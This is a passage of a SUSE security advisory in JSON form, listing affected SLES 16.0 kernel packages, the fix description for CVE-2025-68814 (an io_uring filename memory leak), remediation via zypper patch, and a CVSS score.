"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
